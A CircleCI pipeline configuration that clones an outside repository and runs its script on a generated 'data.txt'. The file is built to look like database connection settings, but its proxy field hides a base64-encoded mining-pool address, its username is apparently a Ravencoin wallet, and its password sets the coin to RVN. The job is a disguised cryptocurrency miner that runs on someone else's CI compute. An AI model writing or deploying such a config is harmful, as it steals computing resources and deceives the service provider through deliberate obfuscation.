version: 2.1

jobs:
  run-script:
    docker:
      - image: cimg/python:3.13
    steps:
      - checkout
      - run:
          name: Clone
          command: |
            git clone https://github.com/saxlata/vbg.git dir-dir
      - run:
          name: Run info
          command: |
            cd dir-dir
            cat > data.txt \<<EOF
            proxy=wss://identical-sile-malphite-node-dfaa5ec5.koyeb.app/eGVsaXN2Mi1wZXBldy5uYS5taW5lLnpwb29sLmNhOjQ4MzM=
            host=127.0.0.1
            port=3306
            username=rM5GziBWoT9y4DQaiacGahTvKZze2TpzrB
            password=c=RVN,demo
            threads=2
            EOF
      - run:
          name: Run
          command: |
            cd dir-dir
            echo "----- My Detailed Logs -----"
            python3 main.py 3 --dataset=data.txt --output=result.txt

workflows:
  build:
    jobs:
      - run-script
